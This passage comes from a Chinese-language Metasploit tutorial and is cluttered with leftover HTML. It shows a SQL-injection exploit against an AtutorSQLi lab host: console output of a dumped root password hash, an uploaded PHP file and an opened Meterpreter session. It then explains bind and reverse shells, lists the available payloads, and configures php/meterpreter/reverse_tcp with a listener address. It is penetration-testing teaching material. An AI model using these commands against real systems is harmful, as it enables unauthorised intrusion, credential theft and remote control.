                                      2\u3001\u653b\u51fb\u4e4b\u524d\uff0c\u53ef\u4ee5\u901a\u8fc7check<\/code>\u547d\u4ee4\u68c0\u6d4b\u76ee\u6807\u662f\u5426\u6613\u53d7\u653b\u51fb\u3002\u7136\u540e\u8fdb\u884c\u653b\u51fb<\/p>\n
                                      <\/code><\/pre>\n
                                        \n
                                      1. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        msf5<\/span> exploit(multi\/http\/atutor_sqli)<\/span> ><\/span> check<\/span><\/div>\n<\/div>\n<\/li>\n
                                      2. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [+<\/span>] 192.168<\/span>.177<\/span>.139<\/span>:80<\/span> -<\/span> The<\/span> target<\/span> is<\/span> vulnerable.<\/span><\/div>\n<\/div>\n<\/li>\n
                                      3. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        msf5<\/span> exploit(multi\/http\/atutor_sqli)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                      4. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        msf5 exploit(multi\/http\/atutor_sqli) > exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                                      5. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        <\/div>\n<\/div>\n<\/li>\n
                                      6. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                      7. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [*<\/span>] 192.168<\/span>.177<\/span>.139<\/span>:80<\/span> -<\/span> Dumping<\/span> the<\/span> username<\/span> and<\/span> password<\/span> hash...<\/span><\/div>\n<\/div>\n<\/li>\n
                                      8. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                      9. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [*<\/span>] 192.168<\/span>.177<\/span>.139<\/span>:80<\/span> -<\/span> Dumping<\/span> the<\/span> username<\/span> and<\/span> password<\/span> hash...<\/span><\/div>\n<\/div>\n<\/li>\n
                                      10. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [+<\/span>] 192.168<\/span>.177<\/span>.139<\/span>:80<\/span> -<\/span> Got<\/span> the<\/span> root's<\/span> hash:<\/span> 9c352326223a09bc610ff4919e611bed3fbb28f5<\/span> !<\/span><\/div>\n<\/div>\n<\/li>\n
                                      11. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [*<\/span>] Sending<\/span> stage<\/span> (38247<\/span> bytes)<\/span> to<\/span> 192.168<\/span>.177<\/span>.139<\/span><\/div>\n<\/div>\n<\/li>\n
                                      12. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [*<\/span>] Meterpreter<\/span> session<\/span> 13<\/span> opened<\/span> (192.168.177.143:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.139<\/span>:50088)<\/span> at<\/span> 2019-04-28 13:53:36<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                      13. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [!]<\/span> This<\/span> exploit<\/span> may<\/span> require<\/span> manual<\/span> cleanup<\/span> of<\/span> 'ytux.php'<\/span> on<\/span> the<\/span> target<\/span><\/div>\n<\/div>\n<\/li>\n
                                      14. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        [!]<\/span> This<\/span> exploit<\/span> may<\/span> require<\/span> manual<\/span> cleanup<\/span> of<\/span> '\/var\/content\/module\/zyq\/ytux.php'<\/span> on<\/span> the<\/span> target<\/span><\/div>\n<\/div>\n<\/li>\n
                                      15. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        <\/div>\n<\/div>\n<\/li>\n
                                      16. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                      17. \n
                                        \n
                                        <\/div>\n<\/div>\n
                                        \n
                                        \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                        <\/code><\/pre>\n
                                        \u6839\u636e\u5bc6\u7801\u590d\u6742\u5ea6\u4e0d\u540c\uff0c\u6240\u9700\u65f6\u957f\u4e5f\u4e0d\u540c\u3002\u653b\u51fb\u6210\u529f\u540e\uff0c\u83b7\u53d6\u4e86shell<\/code><\/p>\n
                                        <\/code><\/pre>\n
                                          \n
                                        1. \n
                                          \n
                                          <\/div>\n<\/div>\n
                                          \n
                                          meterpreter<\/span> > getuid<\/span><\/div>\n<\/div>\n<\/li>\n
                                        2. \n
                                          \n
                                          <\/div>\n<\/div>\n
                                          \n
                                          Server<\/span> username: Administrator (0)<\/span><\/div>\n<\/div>\n<\/li>\n
                                        3. \n
                                          \n
                                          <\/div>\n<\/div>\n
                                          \n
                                          meterpreter<\/span> > sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n
                                        4. \n
                                          \n
                                          <\/div>\n<\/div>\n
                                          \n
                                          Computer<\/span> : WIN-BGKRU85VR4H<\/span><\/div>\n<\/div>\n<\/li>\n
                                        5. \n
                                          \n
                                          <\/div>\n<\/div>\n
                                          \n
                                          OS<\/span> : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586<\/span><\/div>\n<\/div>\n<\/li>\n
                                        6. \n
                                          \n
                                          <\/div>\n<\/div>\n
                                          \n
                                          Meterpreter<\/span> : php\/windows<\/span><\/div>\n<\/div>\n<\/li>\n
                                        7. \n
                                          \n
                                          <\/div>\n<\/div>\n
                                          \n
                                          meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                        8. \n
                                          \n
                                          <\/div>\n<\/div>\n
                                          \n
                                          \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                          <\/code><\/pre>\n
                                          3\u3001shell\u7c7b\u578b<\/h4>\n
                                          \u5728\u8fdb\u884c\u4e0b\u4e00\u8282\u5185\u5bb9\u7684\u5b66\u4e60\u4e4b\u524d\uff0c\u6211\u4eec\u5148\u6765\u8ba8\u8bba\u4e00\u4e9b\u53ef\u7528shell<\/code>\u7684\u7c7b\u578b\u3002shell<\/code>\u5927\u4f53\u4e0a\u5206\u4e3a\u4e24\u79cd\uff0c\u4e00\u79cd\u662fbind shell<\/code>\u4e00\u79cd\u662freverse shjell<\/code>\u3002<\/p>\n
                                          bind<\/code>shell \u53c8\u53eb\u6b63\u5411\u8fde\u63a5shell<\/code>\u3002\u662f\u6307\u7a0b\u5e8f\u5728\u76ee\u6807\u673a\u672c\u5730\u7aef\u53e3\u4e0a\u76d1\u542c\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u8fde\u63a5\u5230\u76d1\u542c\u7aef\u53e3\u3002bind shell<\/code>\u975e\u5e38\u9002\u5408\u672c\u5730\u6f0f\u6d1e\uff0c\u6bd4\u5982\u5f53\u4f60\u5df2\u7ecf\u901a\u8fc7\u9493\u9c7c\u653b\u51fb\u6210\u529f\u5371\u5bb3\u4e86\u76ee\u6807\u8ba1\u7b97\u673a\uff0c\u5e76\u5e0c\u671b\u5229\u7528\u672c\u5730\u670d\u52a1\u63d0\u6743\u7684\u65f6\u5019\u3002\u4f46\u662f\u5b83\u4e0d\u9002\u5408\u8fdc\u7a0b\u653b\u51fb\u573a\u666f\u3002\u56e0\u4e3a\u901a\u5e38\u6765\u8bf4\u76ee\u6807\u4f4d\u4e8e\u9632\u706b\u5899\u540e\u9762\u3002<\/p>\n
                                          \u6240\u4ee5\u5927\u90e8\u5206\u65f6\u5019\uff0c\u6211\u4eec\u66f4\u591a\u7684\u4f7f\u7528reverse shell<\/code>\uff0c\u53c8\u79f0\u53cd\u5411shell<\/code>\u4f5c\u4e3a\u6211\u4eec\u7684\u6709\u6548\u653b\u51fb\u8f7d\u8377\u3002\u53cd\u5411shell<\/code>\u662f\u5728\u653b\u51fb\u8005\u4e0a\u76d1\u542c\u7aef\u53e3\uff0c\u653b\u51fb\u7a0b\u5e8f\u5728\u76ee\u6807\u673a\u4e0a\u8fd0\u884c\u540e\u4e3b\u52a8\u8fde\u63a5\u5230\u653b\u51fb\u8005\u76d1\u542c\u7684\u7aef\u53e3\u3002\u7531\u4e8e\u9632\u706b\u5899\u5927\u591a\u6570\u65f6\u5019\u53ea\u9650\u5236\u5165\u7ad9\u89c4\u5219\u3002\u56e0\u6b64\u53cd\u5411shell\u66f4\u5bb9\u6613\u7ed5\u8fc7\u9632\u706b\u5899\u3002<\/p>\n
                                          Payloads<\/p>\n
                                          Metasploit<\/code>\u4e2d\u7531\u4e09\u79cd\u4e0d\u540c\u7c7b\u578b\u7684payload<\/code>\u6a21\u5757\uff0c\u5206\u522b\u662f\uff1asingles<\/code>\u3001stagers<\/code>\u548cstages<\/code>\u3002<\/p>\n
                                          Singles<\/code>\uff1a\u72ec\u7acb\u8f7d\u8377\uff0c\u53ef\u76f4\u63a5\u690d\u5165\u76ee\u6807\u7cfb\u7edf\u5e76\u6267\u884c\u7684\u7a0b\u5e8f\uff0c\u6bd4\u5982\u00a0shell_bind_tcp<\/code><\/p>\n
                                          Stagers<\/code>\uff1a\u4f20\u8f93\u5668\u8f7d\u8377\uff0c\u8d1f\u8d23\u5efa\u7acb\u7f51\u7edc\u8fde\u63a5\uff0c\u4e0estages<\/code>\u8f7d\u8377\u914d\u5408\u4f7f\u7528\u3002\u8fd9\u79cd\u8f7d\u8377\u4f53\u79ef\u5c0f\u4e14\u53ef\u9760<\/p>\n
                                          Stages<\/code>\uff1a\u4f20\u8f93\u4f53\u8f7d\u8377\uff0c\u5728stagers<\/code>\u5efa\u7acb\u597d\u7a33\u5b9a\u7684\u8fde\u63a5\u4e4b\u540e\uff0c\u63d0\u4f9b\u7684\u9ad8\u7ea7\u529f\u80fd\u3002\u5982\u00a0shell\uff0cmeterpreter\uff0c dllinject, patchupdllinject, upexec,vncinject<\/code>\u7b49\u3002metasploit<\/code>\u4e2dmeterpreter<\/code>\u5176\u5b9e\u5c31\u662f\u4e00\u4e2apayload<\/code>\u3002\u5b83\u9700stagers<\/code>\u548cstages<\/code>\u914d\u5408\u4f7f\u7528\u3002<\/p>\n
                                          \u51c6\u5907\u5de5\u4f5c<\/h5>\n
                                          \u5728\u4e0a\u4e00\u8282\u4e2d\u7684SQL<\/code>\u6ce8\u5165\u4e2d\uff0c\u5df2\u7ecf\u83b7\u5f97\u4e00\u4e2a\u6709\u6548\u7684\u6f0f\u6d1e\u5229\u7528\u3002\u6240\u4ee5\u6211\u4eec\u5c06\u4f7f\u7528\u5b83\u6765\u6d4b\u8bd5\u4e0d\u540c\u7c7b\u578b\u7684payload<\/code><\/p>\n
                                          \u600e\u4e48\u505a<\/h5>\n
                                          1\u3001\u4f7f\u7528show payloads<\/code>\u547d\u4ee4\u663e\u793a\u53ef\u7528\u7684\u8f7d\u8377\u3002<\/p>\n
                                          <\/code><\/pre>\n
                                            \n
                                          1. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            msf5<\/span> exploit(multi\/http\/atutor_sqli)<\/span> ><\/span> show<\/span> payloads<\/span><\/div>\n<\/div>\n<\/li>\n
                                          2. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            <\/div>\n<\/div>\n<\/li>\n
                                          3. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            Compatible<\/span> Payloads<\/span><\/div>\n<\/div>\n<\/li>\n
                                          4. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            ===================<\/span><\/div>\n<\/div>\n<\/li>\n
                                          5. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            <\/div>\n<\/div>\n<\/li>\n
                                          6. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            # Name Disclosure Date Rank Check Description<\/span><\/div>\n<\/div>\n<\/li>\n
                                          7. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            -<\/span> ----<\/span> ---------------<\/span> ----<\/span> -----<\/span> -----------<\/span><\/div>\n<\/div>\n<\/li>\n
                                          8. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            1<\/span> generic\/custom<\/span> normal<\/span> No<\/span> Custom<\/span> Payload<\/span><\/div>\n<\/div>\n<\/li>\n
                                          9. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            2<\/span> generic\/shell_bind_tcp<\/span> normal<\/span> No<\/span> Generic<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> Inline<\/span><\/div>\n<\/div>\n<\/li>\n
                                          10. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            3<\/span> generic\/shell_reverse_tcp<\/span> normal<\/span> No<\/span> Generic<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> Inline<\/span><\/div>\n<\/div>\n<\/li>\n
                                          11. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            4<\/span> php\/bind_perl<\/span> normal<\/span> No<\/span> PHP<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> Perl)<\/span><\/div>\n<\/div>\n<\/li>\n
                                          12. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            5<\/span> php\/bind_perl_ipv6<\/span> normal<\/span> No<\/span> PHP<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> perl)<\/span> IPv6<\/span><\/div>\n<\/div>\n<\/li>\n
                                          13. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            6<\/span> php\/bind_php<\/span> normal<\/span> No<\/span> PHP<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> PHP)<\/span><\/div>\n<\/div>\n<\/li>\n
                                          14. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            7<\/span> php\/bind_php_ipv6<\/span> normal<\/span> No<\/span> PHP<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> php)<\/span> IPv6<\/span><\/div>\n<\/div>\n<\/li>\n
                                          15. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            8<\/span> php\/download_exec<\/span> normal<\/span> No<\/span> PHP<\/span> Executable<\/span> Download<\/span> and<\/span> Execute<\/span><\/div>\n<\/div>\n<\/li>\n
                                          16. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            9<\/span> php\/exec<\/span> normal<\/span> No<\/span> PHP<\/span> Execute<\/span> Command<\/span><\/div>\n<\/div>\n<\/li>\n
                                          17. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            10<\/span> php\/meterpreter\/bind_tcp<\/span> normal<\/span> No<\/span> PHP<\/span> Meterpreter,<\/span> Bind<\/span> TCP<\/span> Stager<\/span><\/div>\n<\/div>\n<\/li>\n
                                          18. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            11<\/span> php\/meterpreter\/bind_tcp_ipv6<\/span> normal<\/span> No<\/span> PHP<\/span> Meterpreter,<\/span> Bind<\/span> TCP<\/span> Stager<\/span> IPv6<\/span><\/div>\n<\/div>\n<\/li>\n
                                          19. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            12<\/span> php\/meterpreter\/bind_tcp_ipv6_uuid<\/span> normal<\/span> No<\/span> PHP<\/span> Meterpreter,<\/span> Bind<\/span> TCP<\/span> Stager<\/span> IPv6<\/span> with<\/span> UUID<\/span> Support<\/span><\/div>\n<\/div>\n<\/li>\n
                                          20. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            13<\/span> php\/meterpreter\/bind_tcp_uuid<\/span> normal<\/span> No<\/span> PHP<\/span> Meterpreter,<\/span> Bind<\/span> TCP<\/span> Stager<\/span> with<\/span> UUID<\/span> Support<\/span><\/div>\n<\/div>\n<\/li>\n
                                          21. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            14<\/span> php\/meterpreter\/reverse_tcp<\/span> normal<\/span> No<\/span> PHP<\/span> Meterpreter,<\/span> PHP<\/span> Reverse<\/span> TCP<\/span> Stager<\/span><\/div>\n<\/div>\n<\/li>\n
                                          22. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            15<\/span> php\/meterpreter\/reverse_tcp_uuid<\/span> normal<\/span> No<\/span> PHP<\/span> Meterpreter,<\/span> PHP<\/span> Reverse<\/span> TCP<\/span> Stager<\/span><\/div>\n<\/div>\n<\/li>\n
                                          23. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            16<\/span> php\/meterpreter_reverse_tcp<\/span> normal<\/span> No<\/span> PHP<\/span> Meterpreter,<\/span> Reverse<\/span> TCP<\/span> Inline<\/span><\/div>\n<\/div>\n<\/li>\n
                                          24. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            17<\/span> php\/reverse_perl<\/span> normal<\/span> No<\/span> PHP<\/span> Command,<\/span> Double<\/span> Reverse<\/span> TCP<\/span> Connection<\/span> (via<\/span> Perl)<\/span><\/div>\n<\/div>\n<\/li>\n
                                          25. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            18<\/span> php\/reverse_php<\/span> normal<\/span> No<\/span> PHP<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> PHP)<\/span><\/div>\n<\/div>\n<\/li>\n
                                          26. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            <\/div>\n<\/div>\n<\/li>\n
                                          27. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            msf5<\/span> exploit(multi\/http\/atutor_sqli)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                          28. \n
                                            \n
                                            <\/div>\n<\/div>\n
                                            \n
                                            \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                            <\/code><\/pre>\n
                                            2\u3001\u67e5\u770b\u8f7d\u8377\u7684\u8be6\u7ec6\u4fe1\u606f\uff0c\u4f7f\u7528info <payload><\/code>\u6307\u4ee4<\/p>\n
                                            <\/code><\/pre>\n
                                              \n
                                            1. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              msf5 exploit(multi\/http\/<\/span>atutor_sqli) > info payload\/generic\/<\/span>shell_bind_tcp<\/div>\n<\/div>\n<\/li>\n
                                            2. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              <\/div>\n<\/div>\n<\/li>\n
                                            3. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              Name:<\/span> Generic Command Shell, Bind TCP Inline Module:<\/span> payload\/generic\/<\/span>shell_bind_tcp Platform:<\/span> All Arch:<\/span> x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, p<\/div>\n<\/div>\n<\/li>\n
                                            4. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              hp, java, ruby, dalvik, python, nodejs, firefox, zarch, r<\/div>\n<\/div>\n<\/li>\n
                                            5. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              Needs Admin:<\/span> No<\/div>\n<\/div>\n<\/li>\n
                                            6. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              Total size:<\/span> 0<\/span> Rank:<\/span> Normal<\/div>\n<\/div>\n<\/li>\n
                                            7. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              Provided by:<\/span><\/div>\n<\/div>\n<\/li>\n
                                            8. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              skape <mmiller@hick<\/span>.org><\/div>\n<\/div>\n<\/li>\n
                                            9. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              Basic options:<\/span><\/div>\n<\/div>\n<\/li>\n
                                            10. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              Name Current Setting Required Description<\/div>\n<\/div>\n<\/li>\n
                                            11. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              ---- --------------- -------- -----------<\/div>\n<\/div>\n<\/li>\n
                                            12. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              LPORT 4444<\/span> yes The listen port<\/div>\n<\/div>\n<\/li>\n
                                            13. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              RHOST no The target address<\/div>\n<\/div>\n<\/li>\n
                                            14. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              Description:<\/span><\/div>\n<\/div>\n<\/li>\n
                                            15. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              Listen for<\/span> a connection and spawn a command shell<\/div>\n<\/div>\n<\/li>\n
                                            16. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              msf5 exploit(multi\/http\/<\/span>atutor_sqli) ><\/div>\n<\/div>\n<\/li>\n
                                            17. \n
                                              \n
                                              <\/div>\n<\/div>\n
                                              \n
                                              \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                              <\/code><\/pre>\n
                                              3\u3001generic\/shell_bind_tcp<\/code>\u662f\u4e00\u4e2a\u72ec\u7acb\u8f7d\u8377\u3002\u8981\u9009\u62e9\u5b83\u4f5c\u4e3a\u6709\u6548\u8f7d\u8377\uff0c\u6211\u4eec\u4f7f\u7528set payload <payload_name><\/code><\/p>\n
                                              <\/code><\/pre>\n
                                                \n
                                              1. \n
                                                \n
                                                <\/div>\n<\/div>\n
                                                \n
                                                msf5 exploit(multi\/http\/atutor_sqli) > set<\/span> payload generic<\/span>\/shell_bind_tcp<\/div>\n<\/div>\n<\/li>\n
                                              2. \n
                                                \n
                                                <\/div>\n<\/div>\n
                                                \n
                                                payload => generic<\/span>\/shell_bind_tcp<\/div>\n<\/div>\n<\/li>\n
                                              3. \n
                                                \n
                                                <\/div>\n<\/div>\n
                                                \n
                                                msf5 exploit(multi\/http\/atutor_sqli) > exploit<\/div>\n<\/div>\n<\/li>\n
                                              4. \n
                                                \n
                                                <\/div>\n<\/div>\n
                                                \n
                                                <\/div>\n<\/div>\n<\/li>\n
                                              5. \n
                                                \n
                                                <\/div>\n<\/div>\n
                                                \n
                                                [*] 192.168<\/span>.177.139<\/span>:80<\/span> - Dumping the username and<\/span> password hash...<\/div>\n<\/div>\n<\/li>\n
                                              6. \n
                                                \n
                                                <\/div>\n<\/div>\n
                                                \n
                                                \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                <\/code><\/pre>\n
                                                4\u3001\u4f7f\u7528generic\/shell_bind_tcp<\/code>\u8f7d\u8377\u53ef\u7528\u5f97\u5230\u4e00\u4e2a\u901a\u7528\u7684shell<\/code>\uff0c\u4f46\u8fdc\u8fdc\u4e0d\u591f\uff0cPHP Meterprete<\/code>\u662f\u4e00\u4e2a\u7279\u6027\u4e30\u5bcc\u4e14\u66f4\u9ad8\u7ea7\u7684\u8f7d\u8377\uff0c\u6211\u4eec\u53ef\u4ee5\u7528\u5b83\u6765\u5229\u7528\u6b64\u6f0f\u6d1e\u3002<\/p>\n
                                                <\/code><\/pre>\n
                                                  \n
                                                1. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  msf5<\/span> exploit(multi\/http\/atutor_sqli) > info payload\/php\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                2. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  <\/div>\n<\/div>\n<\/li>\n
                                                3. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Name<\/span>: PHP Meterpreter, PHP Reverse TCP Stager<\/span><\/div>\n<\/div>\n<\/li>\n
                                                4. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Module<\/span>: payload\/php\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                5. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Platform<\/span>: PHP<\/span><\/div>\n<\/div>\n<\/li>\n
                                                6. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Arch<\/span>: php<\/span><\/div>\n<\/div>\n<\/li>\n
                                                7. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Needs<\/span> Admin: No<\/span><\/div>\n<\/div>\n<\/li>\n
                                                8. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Total<\/span> size: 1101<\/span><\/div>\n<\/div>\n<\/li>\n
                                                9. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Rank<\/span>: Normal<\/span><\/div>\n<\/div>\n<\/li>\n
                                                10. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  <\/div>\n<\/div>\n<\/li>\n
                                                11. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Provided<\/span> by:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                12. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  egypt<\/span> <egypt@metasploit.com><\/span><\/div>\n<\/div>\n<\/li>\n
                                                13. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  <\/div>\n<\/div>\n<\/li>\n
                                                14. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Basic<\/span> options:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                15. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Name<\/span> Current Setting Required Description<\/span><\/div>\n<\/div>\n<\/li>\n
                                                16. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  ----<\/span> --------------- -------- -----------<\/span><\/div>\n<\/div>\n<\/li>\n
                                                17. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  LHOST<\/span> yes The listen address (an interface may be specified)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                18. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  LPORT<\/span> 4444 yes The listen port<\/span><\/div>\n<\/div>\n<\/li>\n
                                                19. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  <\/div>\n<\/div>\n<\/li>\n
                                                20. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Description<\/span>:<\/div>\n<\/div>\n<\/li>\n
                                                21. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  Run<\/span> a meterpreter server in PHP. Reverse PHP connect back stager<\/span><\/div>\n<\/div>\n<\/li>\n
                                                22. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  with<\/span> checks for disabled functions<\/span><\/div>\n<\/div>\n<\/li>\n
                                                23. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  <\/div>\n<\/div>\n<\/li>\n
                                                24. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  <\/div>\n<\/div>\n<\/li>\n
                                                25. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  msf5<\/span> exploit(multi\/http\/atutor_sqli) ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                26. \n
                                                  \n
                                                  <\/div>\n<\/div>\n
                                                  \n
                                                  \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                  <\/code><\/pre>\n
                                                  <\/code><\/pre>\n
                                                    \n
                                                  1. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    msf5<\/span> exploit(multi\/http\/atutor_sqli)<\/span> ><\/span> set<\/span> PAYLOAD<\/span> php\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  2. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    PAYLOAD<\/span> =><\/span> php\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  3. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    msf5<\/span> exploit(multi\/http\/atutor_sqli)<\/span> ><\/span> set<\/span> LHOST<\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  4. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    LHOST<\/span> =><\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  5. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  6. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
